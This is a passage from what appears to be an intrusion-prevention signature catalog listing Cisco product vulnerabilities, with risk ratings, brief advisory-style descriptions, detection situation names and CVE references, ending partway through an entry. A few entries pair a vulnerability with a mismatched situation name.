There exists an authentication bypass vulnerability in the Cisco REST API virtual service container. This vulnerability could be exploited remotely. Successful exploitation could lead in authentication bypass.

Situation:

HTTP_CSU-Cisco-IOS-XE-Rest-API-Authentication-Bypass

References:

CVE-2019-12643
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12643

Cisco-IOS-XE-Webui-Command-Injection

About this vulnerability:

A vulnerability in Cisco Systems IOS XE

Risk:

Moderate

First detected in:

sgpkg-ips-1647-5242

Last changed:

sgpkg-ips-1647-5242

Platform:

Cisco IOS

Software:

<os>

Type:

Input Validation

Description:

Insufficient validation of IPv6 addresses supplied when performing a software upgrade causes a command injection vulnerability in the Cisco IOS WebUi. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CRL-Cisco-IOS-XE-Webui-Command-Injection

References:

CVE-2023-20273
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-20273

Cisco-IOS-XE-Webui-Command-Injection-CVE-2019-12650

About this vulnerability:

A vulnerability in Cisco IOS XE

Risk:

High

First detected in:

sgpkg-ips-1841-5242

Last changed:

sgpkg-ips-1841-5242

Platform:

Cisco IOS

Software:

<os>

Type:

Input Validation

Description:

A command injection vulnerability in Cisco IOS XE Software Web UI allows an authenticated attacker to execute arbitrary OS commands with root privileges. This vulnerability is due to improper sanitization of a user-provided HTTP parameter value.

Situation:

HTTP_CRL-Cisco-IOS-XE-Webui-Command-Injection-CVE-2019-12650

References:

CVE-2019-12650
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12650

Cisco-IOS-XE-Webui-Command-Injection-CVE-2019-12651

About this vulnerability:

A vulnerability in Cisco IOS XE

Risk:

High

First detected in:

sgpkg-ips-1841-5242

Last changed:

sgpkg-ips-1841-5242

Platform:

Cisco IOS

Software:

<os>

Type:

Input Validation

Description:

A command injection vulnerability in the Web UI of Cisco IOS XE Software allows an authenticated attacker to execute arbitrary Cisco IOS commands. This vulnerability is due to the improper sanitization of a user-provided HTTP parameter value.

Situation:

HTTP_CRL-Cisco-IOS-XE-Webui-Command-Injection-CVE-2019-12651

References:

CVE-2019-12651
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12651

Cisco-License-Manager-Server-Reportcsv-Directory-Traversal

About this vulnerability:

A vulnerability in Cisco Systems License Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1000-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Systems License Manager

Type:

Directory Traversal

Description:

Insufficient validation of paths sent to the reportCSV servlet causes a directory traversal vulnerability in Cisco Systems License Manager. A successful exploit allows an attacker to access arbitrary files on the target system.

Situation:

HTTP_CSU-Cisco-License-Manager-Server-Reportcsv-Directory-Traversal

References:

CVE-2017-12263
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12263

Cisco-Linksys-PlayerPT-ActiveX-Control-Buffer-Overflow

About this vulnerability:

A vulnerability in Linksys (Cisco Systems) PlayerPT

Risk:

Moderate

First detected in:

sgpkg-ips-446-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Linksys PlayerPT

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability has been reported in the Cisco Linksys PlayerPT ActiveX control. The vulnerability is due to insufficient boundary checks when handling parameters passed to the SetSource() function. A remote, unauthenticated attacker can exploit this vulnerability by enticing an unsuspecting user to access a malicious website. This can lead to code execution in the context of the target user. If code execution is unsuccessful, the application may terminate unexpectedly.

Situation:

File-Text_Cisco-Linksys-PlayerPT-ActiveX-Control-Buffer-Overflow

References:

OSVDB-80297
http://www.osvdb.org/80297

Cisco-Linksys-PlayerPT-Buffer-Overflow

About this vulnerability:

A Cisco Linksys PlayerPT Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-709-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Linksys PlayerPT

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Cisco Linksys PlayerPT ActiveX Control, version 1.0.0.15, which allows remote attackers to execute arbitrary code via a long URL in the first argument of a SetSource method.

Situation:

File-Text_Cisco-Linksys-PlayerPT-Buffer-Overflow

References:

CVE-2012-0284
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0284

BID-54588
http://www.securityfocus.com/bid/54588

OSVDB-84309
http://www.osvdb.org/84309

Cisco-Network-Admission-Control-Directory-Traversal

About this vulnerability:

A Cisco Network Admission Control Directory Traversal vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-712-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Network Admission Control

Type:

Directory Traversal

Description:

A vulnerability in Cisco Network Admission Control, versions 4.8.x, which allows remote attackers to read arbitrary files via directory traversal.

Situation:

HTTP_CRL-Cisco-Network-Registrar-Default-Credentials-Authentication-Bypass

References:

CVE-2011-3305
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3305

BID-49954
http://www.securityfocus.com/bid/49954

OSVDB-76080
http://www.osvdb.org/76080

Cisco-Network-Registrar-Default-Credentials-Authentication-Bypass

About this vulnerability:

An attempt to exploit vulnerability in Cisco Network Registrar (CUPS) detected

Risk:

Moderate

First detected in:

sgpkg-ips-395-4219

Last changed:

sgpkg-ips-1583-5242

Platform:

Generic

Software:

Cisco Network Registrar

Type:

Insecure Configuration

Description:

An authentication weakness vulnerability exists in Cisco Network Registrar. The vulnerability is due to using a default password for the administrative account.

Situation:

References:

CVE-2011-2024
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2024

BID-48076
http://www.securityfocus.com/bid/48076

OSVDB-72720
http://www.osvdb.org/72720

Cisco-Nexus-Dashboard-Fabric-Controller-Amf-Insecure-Deserialization

About this vulnerability:	A vulnerability in Cisco Systems Nexus Dashboard Fabric Controller
Risk:	Moderate
First detected in:	sgpkg-ips-1505-5242
Last changed:	sgpkg-ips-1505-5242
Platform:	Generic
Software:	Cisco Systems Nexus Dashboard Fabric Controller
Type:	Input Validation
Description:	Improper validation of user-sent data when processing AMF messages causes an insecure deserialization vulnerability in Cisco Systems Nexus Dashboard Fabric Controller. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation:	HTTP_CRL-Cisco-Nexus-Dashboard-Fabric-Controller-Amf-Insecure-Deserialization

Cisco-NX-OS-Section-And-Less-Privilege-Escalation

About this vulnerability:

A vulnerability in Cisco Systems Cisco NX-OS

Risk:

Moderate

First detected in:

sgpkg-ips-421-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Cisco

Software:

<os>

Type:

Input Validation

Description:

There is a command execution vulnerability in Cisco NX-OS. The vulnerability is due to insufficient validation of CLI input containing the pipe character (|). Remote authenticated attackers can exploit this vulnerability by using specially crafted commands on a vulnerable system. Successful exploitation could cause execution of restricted commands, resulting in access to the underlying Linux operating system.

Situation:

Telnet_Telnet-Cisco-NX-OS-Section-And-Less-Privilege-Escalation

References:

CVE-2011-2569
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2569

OSVDB-76620
http://www.osvdb.org/76620

Cisco-Prime-Collaboration-Provisioning-Arbitrary-File-Deletion

About this vulnerability:

A vulnerability in Cisco Systems Prime Collaboration Provisioning

Risk:

Moderate

First detected in:

sgpkg-ips-1009-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Systems Prime Collaboration Provisioning

Type:

Directory Traversal

Description:

Cisco Prime Collaboration Provisioning software has a vulnerability, which can lead to arbitrary deletion of files by a remote, unauthenticated attacker.

Situation:

HTTPS_CS-Cisco-Prime-Collaboration-Provisioning-Arbitrary-File-Deletion

References:

CVE-2017-6637
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6637

Cisco-Prime-Collaboration-Provisioning-Licensestatus-Arbitrary-File-Deletion

About this vulnerability:

A vulnerability in Cisco Systems Prime Collaboration Provisioning

Risk:

Moderate

First detected in:

sgpkg-ips-944-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Systems Prime Collaboration Provisioning

Type:

Directory Traversal

Description:

Insufficient validation of HTTP requests causes an arbitrary file deletion vulnerability in Cisco Systems Prime Collaboration Provisioning. A successful attack allows a remote attacker to delete arbitrary files on the target system.

Situation:

HTTP_CRL-Cisco-Prime-Collaboration-Provisioning-Licensestatus-Arbitrary-File-Deletion

References:

CVE-2017-6635
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6635

Cisco-Prime-Collaboration-Provisioning-Logconfigtracer.jsp-Directory-Traversal

About this vulnerability:

A vulnerability in Cisco Systems Prime Collaboration Provisioning

Risk:

Moderate

First detected in:

sgpkg-ips-970-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Systems Prime Collaboration Provisioning

Type:

Directory Traversal

Description:

Improper validation of filenames causes a directory traversal vulnerability in Cisco Systems Prime Collaboration Provisioning. A successful attack allows arbitrary file access remotely without authentication.

Situation:

HTTP_CRL-Cisco-Prime-Collaboration-Provisioning-Logconfigtracer.jsp-Directory-Traversal

References:

CVE-2017-6621
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6621

Cisco-Prime-Collaboration-Provisioning-Scriptmgr-Authentication-Bypass

About this vulnerability:

A vulnerability in Cisco Systems Prime Collaboration Provisioning

Risk:

Moderate

First detected in:

sgpkg-ips-943-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Systems Prime Collaboration Provisioning

Type:

Malfunction

Description:

Improper validation of HTTP requests causes an authentication bypass vulnerability in Cisco Systems Prime Collaboration Provisioning. A successful attack allows a remote attacker to run arbitrary code with root privileges.

Situation:

HTTP_CSU-Cisco-Prime-Collaboration-Provisioning-Scriptmgr-Authentication-Bypass

References:

CVE-2017-6622
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6622

Cisco-Prime-Data-Center-Network-Manager-Downloadservlet-Information-Disclosure

About this vulnerability:

A vulnerability in Cisco Systems Prime Data Center Network Manager

Risk:

High

First detected in:

sgpkg-ips-559-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Systems Prime Data Center Network Manager

Type:

Directory Traversal

Description:

An information disclosure vulnerability exists in Cisco Prime Data Center Network Manager. The vulnerability is due to lack of authentication and insufficient input validation in DownloadServlet when processing HTTP requests. A remote unauthenticated attacker can download arbitrary files from arbitrary locations. This can be leveraged to obtain sensitive information from a target system.

Situation:

HTTP_CRL-Cisco-Prime-Data-Center-Network-Manager-Downloadservlet-Information-Disclosure

References:

CVE-2013-5487
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5487

BID-62483
http://www.securityfocus.com/bid/62483

OSVDB-97428
http://www.osvdb.org/97428

Cisco-Prime-Data-Center-Network-Manager-Fileupload-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in Cisco Systems Prime Data Center Network Manager (DCNM)

Risk:

Moderate

First detected in:

sgpkg-ips-1183-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Systems Prime Data Center Network Manager

Type:

Input Validation

Description:

There has been reported an arbitrary file upload vulnerability in Cisco Prime Data Center Network Manager. Successful exploitation can lead in arbitrary code execution.

Situation:

HTTP_CS-Cisco-Prime-Data-Center-Network-Manager-Fileupload-Arbitrary-File-Upload

References:

CVE-2019-1620
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1620

Cisco-Prime-Data-Center-Network-Manager-Fileuploadservlet-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in Cisco Systems Prime Data Center Network Manager

Risk:

Moderate

First detected in:

sgpkg-ips-558-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Systems Prime Data Center Network Manager

Type:

Input Validation

Description:

An arbitrary file upload vulnerability exists in Cisco Prime Data Center Network Manager. The vulnerability is due to lack of authentication and insufficient input validation in the FileUploadServlet when processing HTTP requests. A remote unauthenticated attacker can upload arbitrary files to arbitrary locations. In a successful attack scenario, the attacker can execute arbitrary code with SYSTEM privileges by placing files in critical locations.

Situation:

HTTP_CSU-Cisco-Prime-Data-Center-Network-Manager-Fileuploadservlet-Arbitrary-File-Upload

References:

CVE-2013-5486
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5486

BID-62484
http://www.securityfocus.com/bid/62484

OSVDB-97425
http://www.osvdb.org/97425

Cisco-Prime-Data-Center-Network-Manager-Information-Disclosure

About this vulnerability:

A vulnerability in Cisco Systems Prime Data Center Network Manager

Risk:

High

First detected in:

sgpkg-ips-639-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Systems Prime Data Center Network Manager

Type:

Directory Traversal

Description:

An information disclosure vulnerability has been reported in Cisco Prime Data Center Network Manager. The vulnerability is due to an input validation error that allows the retrieval of arbitrary files from the server. By sending crafted HTTP requests to the target system, a remote unauthenticated attacker can leverage this vulnerability to view the contents of arbitrary files on a target server with System privileges.

Situation:

HTTP_CSU-Cisco-Prime-Data-Center-Network-Manager-Information-Disclosure

References:

CVE-2015-0666
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0666

Cisco-Prime-Data-Center-Network-Manager-Processimagesave-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in Cisco Systems Prime Data Center Network Manager

Risk:

Moderate

First detected in:

sgpkg-ips-558-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Systems Prime Data Center Network Manager

Type:

Directory Traversal

Description:

There is an arbitrary file upload vulnerability in Cisco Prime Data Center Network Manager. The vulnerability is due to lack of authentication and insufficient input validation in the processImageSave.jsp when processing HTTP requests. A remote unauthenticated attacker can upload arbitrary files to arbitrary locations. In a successful attack scenario, the attacker can execute arbitrary code with SYSTEM privileges by placing executable files in critical locations.

Situation:

HTTP_CRL-Cisco-Prime-Data-Center-Network-Manager-Processimagesave.jsp-Arbitrary-File-Upload

References:

CVE-2013-5486
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5486

BID-62484
http://www.securityfocus.com/bid/62484

OSVDB-97426
http://www.osvdb.org/97426

Cisco-Prime-Infrastructure-And-Dcnm-Xmpfileuploadservlet-Directory-Traversal

About this vulnerability:

A vulnerability in Cisco Systems Prime Data Center Network Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1070-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Systems Prime Data Center Network Manager; Cisco Systems Prime Infrastructure

Type:

Input Validation

Description:

Improper validation of request parameters causes a directory traversal vulnerability in Cisco Systems Prime Data Center Network Manager. A successful exploit allows an attacker to write arbitrary files into locations where they will be executed.

Situation:

HTTP_CRL-Cisco-Prime-Infrastructure-And-Dcnm-Xmpfileuploadservlet-Directory-Traversal

References:

CVE-2018-0258
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0258

Cisco-Prime-Infrastructure-And-Epnm-Deserialization-Code-Execution

About this vulnerability:

A vulnerability in Cisco Systems Evolved Programmable Network Manager

Risk:

Moderate

First detected in:

sgpkg-ips-781-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Systems Evolved Programmable Network Manager; Cisco Systems Prime Infrastructure

Type:

Input Validation

Description:

Insufficient input validation causes a deserialization vulnerability in the affected prducts. A successful exploit allows an attacker to run code at administrative privileges.

Situation:

HTTP_CSU-Cisco-Prime-Infrastructure-And-Epnm-Deserialization-Code-Execution

References:

CVE-2016-1291
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1291

Cisco-Prime-Infrastructure-And-Epnm-Importjobresults-XSS

About this vulnerability:

A vulnerability in Cisco Systems Evolved Programmable Network Manager

Risk:

Moderate

First detected in:

sgpkg-ips-958-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Systems Evolved Programmable Network Manager; Cisco Systems Prime Infrastructure

Type:

Input Validation

Description:

A reflected cross-site scripting vulnerability has been reported in Cisco Prime Infrastructure and Evolved Programmable Network Manager. Tricking user to visit a crafter URL may result in arbitrary script code in the target user's browser.

Situation:

HTTP_CSU-Cisco-Prime-Infrastructure-And-Epnm-Importjobresults-XSS

References:

CVE-2017-6699
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6699

Cisco-Prime-Infrastructure-And-Epnm-Uploadservlet-Tar-Directory-Traversal

About this vulnerability:

A vulnerability in Cisco Systems Evolved Programmable Network Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1173-5242

Last changed:

sgpkg-ips-1606-5242

Platform:

Generic

Software:

Cisco Systems Evolved Programmable Network Manager

Type:

Input Validation

Description:

Improper validation of a user-supplied tar file causes a directory traversal vulnerability in Cisco Systems Evolved Programmable Network Manager. A successful exploit allows an attacker to overwrite and subsequently execute any file path accessible to the server process.

Situation:

HTTP_CRL-Cisco-Prime-Infrastructure-And-Epnm-Dashboardrenderer-XML-External-Entity-Injection

References:

CVE-2019-1821
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1821

Cisco-Prime-Infrastructure-And-Epnm-XML-External-Entity-Injection

About this vulnerability:

A vulnerability in Cisco Systems Evolved Programmable Network Manager

Risk:

Moderate

First detected in:

sgpkg-ips-941-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Systems Evolved Programmable Network Manager; Cisco Systems Prime Infrastructure

Type:

Input Validation

Description:

Inproper handling of external entity tags in Cisco Prime Infrastructure causes a vulnerability that allows an attacker to upload files to the target system and disclose filesystem contents.

Situation:

References:

CVE-2017-6662
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6662

Cisco-Prime-Infrastructure-Remote-Code-Execution

About this vulnerability:

A vulnerability in Cisco Prime Infrastructure

Risk:

High

First detected in:

sgpkg-ips-1174-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Systems Prime Infrastructure

Type:

Insecure Configuration

Description:

A vulnerability in Cisco Prime Infrastructure which allows remote attackers to upload files and execute arbitrary code due to the lack of authentication.

Situation:

HTTP_CSU-Cisco-Prime-Infrastructure-Remote-Code-Execution

References:

CVE-2018-15379
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15379

Cisco-Prime-Infrastructure-Swimtemp-TFTP-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in Cisco Systems Prime Infrastructure

Risk:

Moderate

First detected in:

sgpkg-ips-1111-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Systems Prime Infrastructure

Type:

Malfunction

Description:

Improper handling of TFTP file uploads causes a vulnerability in Cisco Systems Prime Infrastructure. A successful exploit allows an attacker to upload files that will be executed on the target system, allowing arbitrary code execution.

Situation:

TFTP_CS-Cisco-Prime-Infrastructure-Swimtemp-TFTP-Arbitrary-File-Upload

References:

CVE-2018-15379
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15379

Cisco-Prime-Infrastructure-TarArchive-Directory-Traversal

About this vulnerability:

A vulnerability in Cisco Prime Infrastructure

Risk:

High

First detected in:

sgpkg-ips-1196-5242

Last changed:

sgpkg-ips-1645-5242

Platform:

Generic

Software:

Cisco Systems Prime Infrastructure

Type:

Directory Traversal

Description:

A vulnerability in Cisco Prime Infrastructure 3.4.0.0 which allows remote attackers to upload malicious files and execute arbitrary code due to the lack of proper validation of user input.

Situation:

HTTP_CS-Cisco-Prime-Infrastructure-And-Epnm-Xmplogfilesdownloadservlet-Directory-Traversal

References:

CVE-2019-1821
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1821

Cisco-Prime-Infrastructure-Xmplogfilesdownloadservlet-Directory-Traversal

About this vulnerability:

A vulnerability in Cisco Systems Evolved Programmable Network Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1173-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Systems Evolved Programmable Network Manager

Type:

Input Validation

Description:

Improper validation of a user-supplied data used for file operations causes a directory traversal vulnerability in Cisco Systems Evolved Programmable Network Manager. A successful exploit allows an attacker to download any file accessible to the server process.

Situation:

References:

CVE-2019-1819
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1819

Cisco-Prime-Lan-Management-Solution-Remote-Command-Execution

About this vulnerability:

A vulnerability in Cisco Systems Prime LAN Management Solution

Risk:

High

First detected in:

sgpkg-ips-561-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Systems Prime LAN Management Solution

Type:

Malfunction

Description:

An access control vulnerability has been reported in Cisco Prime LAN Management Solution. The vulnerability is due to insufficient validation of users using rsh. A remote attacker can exploit this vulnerability by accessing the rsh service. This can result in arbitrary command execution in the context of the root user.

Situation:

RSH_CS-Cisco-Prime-Lan-Management-Solution-Remote-Command-Execution
RSH_CS-Cisco-Prime-Lan-Management-Solution-Remote-Command-Execution-2

References:

CVE-2012-6392
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6392

BID-57221
http://www.securityfocus.com/bid/57221

OSVDB-89112
http://www.osvdb.org/89112

Cisco-Prime-Network-Analysis-Module-Graph-Sfile-Directory-Traversal

About this vulnerability:

A vulnerability in Cisco Systems Prime Network Analysis Module

Risk:

Moderate

First detected in:

sgpkg-ips-1023-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Systems Prime Network Analysis Module

Type:

Input Validation

Description:

Improper handling of HTTP request parameters causes a directory traversal vulnerability in Cisco Systems Prime Network Analysis Module. Successful exploitation allows an attacker to access arbitrary files on the target system.

Situation:

HTTP_CRL-Cisco-Prime-Network-Analysis-Module-Graph-Sfile-Directory-Traversal

References:

CVE-2017-12285
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12285

Cisco-PVC2300-POE-Video-Camera-Configuration-Download

About this vulnerability:	A vulnerability in Cisco PVC2300 cameras.
Risk:	High
First detected in:	sgpkg-ips-1499-5242
Last changed:	sgpkg-ips-1499-5242
Platform:	Generic
Software:	Cisco PVC2300 Cameras
Type:	Insecure Configuration
Description:	A vulnerability in Cisco PVC2300 Cameras which allows remote attackers to use hardcoded credentials to download the configuration file and obtain admin credentials.
Situation:	HTTP_CSU-Cisco-PVC2300-POE-Video-Camera-Configuration-Download

Cisco-Remote-Access-VPN-Brute-Force-CVE-2024-20481

About this vulnerability:

An attempt to exploit a vulnerability in Cisco Remote Access VPN detected

Risk:

High

First detected in:

sgpkg-ips-1829-5242

Last changed:

sgpkg-ips-1829-5242

Platform:

Generic

Software:

Cisco Adaptive Security Appliance

Type:

Brute Force

Description:

A vulnerability in the Remote Access VPN (RAVPN) service of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a denial-of-service (DoS) of the RAVPN service. This vulnerability is due to resource exhaustion. An attacker could exploit this vulnerability by sending a large number of VPN authentication requests to an affected device. Depending on the impact of the attack, a reload of the device may be required to restore the RAVPN service.

Situation:

File-TextId_Cisco-Remote-Access-VPN-Login-Failure

References:

CVE-2024-20481
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20481

Cisco-Router-Management-Interface-RCE

About this vulnerability:

A vulnerability in Cisco Router Management Interface

Risk:

High

First detected in:

sgpkg-ips-1196-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Router

Type:

Input Validation

Description:

A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, RV130W Wireless-N Multifunction VPN Router, and RV215W Wireless-N VPN Router, which allows remote attackers to execute arbitrary code due to the improper validation of user input.

Situation:

HTTP_CRL-Cisco-Router-Management-Interface-RCE

References:

CVE-2019-1663
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1663

Cisco-Router-SYNful-Knock

About this vulnerability:	Cisco Router SYNful Knock
Risk:	High
First detected in:	sgpkg-ips-696-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Cisco
Software:	<os>
Type:	Remote Control
Description:	SYNful Knock is a Cisco router implant that allows an attacker to remotely control the affected device.
Situation:	Generic_CS-Cisco-Router-SYNful-Knock-Command

Cisco-RV-Series-Authentication-Bypass-And-Command-Injection

About this vulnerability:

A vulnerability in Cisco Small Business Routers.

Risk:

High

First detected in:

sgpkg-ips-1566-5242

Last changed:

sgpkg-ips-1566-5242

Platform:

Unix; Linux

Software:

Cisco Small Business RV VPN/Routers

Type:

Input Validation

Description:

A vulnerability in Cisco RV160, RV260, RV340, and RV345 Small Business Routers, with firmware versions 1.0.03.24 and below, which allows remote attackers to execute arbitrary commands via a session ID directory traversal authentication bypass CVE-2022-20705 and a command injection vulnerability CVE-2022-20707.

Situation:

HTTP_CS-Cisco-RV-Series-Authentication-Bypass-And-Command-Injection

References:

CVE-2022-20705
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-20705

Cisco-RV-Series-Router-Command-Execution-CVE-2023-20118

About this vulnerability:

A vulnerability in Cisco RV Series routers

Risk:

High

First detected in:

sgpkg-ips-1846-5242

Last changed:

sgpkg-ips-1846-5242

Platform:

Generic

Software:

Cisco Router

Type:

Input Validation

Description:

Insufficient validation of user-supplied input leads into a command execution vulnerability on multiple Cisco RV Series Small Business routers. A remote, authenticated attacker can use this vulnerability to gain root privileges and execute arbitrary commands via a crafted HTTP request.

Situation:

HTTP_CSU-Cisco-RV-Series-Router-Command-Execution-CVE-2023-20118

References:

CVE-2023-20118
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-20118

Cisco-RV-Series-Router-Remote-Code-Execution-CVE-2022-20699

About this vulnerability:

A vulnerability in Cisco RV Routers

Risk:

High

First detected in:

sgpkg-ips-1444-5242

Last changed:

sgpkg-ips-1444-5242

Platform:

Generic

Software:

Cisco Router

Type:

Malfunction

Description:

A pre-auth remote code execution vulnerability has been reported in Cisco RV160, RV260, RV340, and RV345 series routers.

Situation:

HTTP_CRL-Cisco-RV-Series-Router-Remote-Code-Execution-CVE-2022-20699

References:

CVE-2022-20699
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-20699

Cisco-RV320-And-RV325-Information-Disclosure-CVE-2019-1653

About this vulnerability:

A vulnerability in Cisco RV320 and RV325 routers

Risk:

High

First detected in:

sgpkg-ips-1841-5242

Last changed:

sgpkg-ips-1841-5242

Platform:

Generic

Software:

Cisco Router

Type:

Insecure Configuration

Description:

A vulnerability in the management interface of the Cisco RV320 and RV325 routers allows unauthenticated attackers to obtain sensitive information due to improper URL access controls. This vulnerability can be combined with CVE-2019-1652 for unauthenticated remote command execution.

Situation:

HTTP_CRL-Cisco-RV320-And-RV325-Information-Disclosure-CVE-2019-1653

References:

CVE-2019-1653
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1653

Cisco-RV320-And-RV325-Remote-Code-Execution-CVE-2019-1652

About this vulnerability:

A vulnerability in Cisco RV320 and RV325 routers

Risk:

High

First detected in:

sgpkg-ips-1151-5242

Last changed:

sgpkg-ips-1841-5242

Platform:

Generic

Software:

Cisco Router

Type:

Code Injection

Description:

A vulnerability in the management interface of the Cisco RV320 and RV325 routers allows authenticated attackers to execute arbitrary commands via HTTP POST requests. An unauthenticated attacker may exploit CVE-2019-1653 first to gain access to the required credentials, effectively allowing unauthenticated arbitrary command execution.

Situation:

HTTP_CRL-Cisco-RV320-And-RV325-Remote-Code-Execution-CVE-2019-1652

References:

CVE-2019-1652
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1652

Cisco-SA500-Series-Security-Appliances-SQL-Injection

About this vulnerability:

A vulnerability in Cisco SA500 series Security Appliances

Risk:

High

First detected in:

sgpkg-ips-608-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco SA500 Series Security Appliances

Type:

SQL Injection

Description:

There is an SQL injection vulnerability in the web management interface of Cisco SA500 series security appliances. The vulnerability allows a remote attacker to execute arbitrary SQL code.

Situation:

HTTP_CSU-Cisco-SA500-Series-Security-Appliances-SQL-Injection

References:

CVE-2011-2546
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2546

BID-48812
http://www.securityfocus.com/bid/48812

Cisco-SA520W-Security-Appliance-Directory-Traversal

About this vulnerability:	A vulnerability in Cisco SA520W
Risk:	High
First detected in:	sgpkg-ips-1645-5242
Last changed:	sgpkg-ips-1645-5242
Platform:	Generic
Software:	Cisco SA500 Series Security Appliances
Type:	Input Validation
Description:	A directory traversal vulnerability has been reported in Cisco SA520W Security Appliance. Successful exploitation of this vulnerability could result in sensitive information disclosure.
Situation:	HTTP_CRL-Cisco-SA520W-Security-Appliance-Directory-Traversal

Cisco-SD-WAN-Solution-Vmanage-SQL-Injection

About this vulnerability:

A vulnerability in Cisco Systems SD-WAN Solution

Risk:

Moderate

First detected in:

sgpkg-ips-1244-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Systems SD-WAN Solution

Type:

Input Validation

Description:

Improper validation of HTTP requests in the web UI of Cisco SD-WAN Solution vManage software causes an SQL injection vulnerability that can be exploited to run arbitrary SQL statements with the privileges of the user.

Situation:

HTTP_CRL-Cisco-SD-WAN-Solution-Vmanage-SQL-Injection

References:

CVE-2019-16012
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16012

Cisco-Secure-ACS-EAP-TLS-Authentication-Bypass-Vulnerability

About this vulnerability:

A Cisco Secure ACS EAP-TLS Authentication Bypass vulnerability

Risk:

High

First detected in:

sgpkg-ips-1001-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Secure ACS

Type:

Malfunction

Description:

